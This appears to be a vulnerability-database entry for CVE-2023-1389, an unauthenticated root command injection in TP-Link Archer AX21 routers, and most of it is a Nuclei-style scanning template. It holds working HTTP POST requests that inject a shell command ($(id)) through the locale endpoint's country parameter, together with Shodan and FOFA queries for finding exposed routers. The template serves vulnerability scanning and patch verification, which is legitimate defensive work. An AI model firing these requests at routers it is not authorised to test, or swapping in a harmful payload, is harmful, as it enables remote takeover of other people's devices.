漏洞描述
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
CVE-2023-1389: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
PoC代码[已公开]
id: CVE-2023-1389
info:
name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
author: ritikchaddha
severity: critical
description: |
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
remediation: |
Update to the latest firmware version provided by TP-Link.
reference:
- https://www.tenable.com/security/research/tra-2023-11
- https://nvd.nist.gov/vuln/detail/CVE-2023-1389
- https://github.com/tenable/poc-cve-2023-1389
classification:
cve-id: CVE-2023-1389
cwe-id: CWE-78
epss-score: 0.93818
epss-percentile: 0.99859
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
max-request: 1
vendor: tp-link
product: archer-ax21
fofa-query: body="tp-link"
shodan-query: 'title:"TP-Link Router"'
verified: true
tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev
http:
- raw:
- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id)
- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id)
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4b0a004830460221008b14297845ae3a35d659952c4d6f3fb48fa77275cfb76e5c22e488ba3b56ed02022100a67d3c7d63605ce0cb0837bd60dfa38cd177fb1a05d44d00a6839012e57dd36f:922c64590222798bb761d5b6d8e72950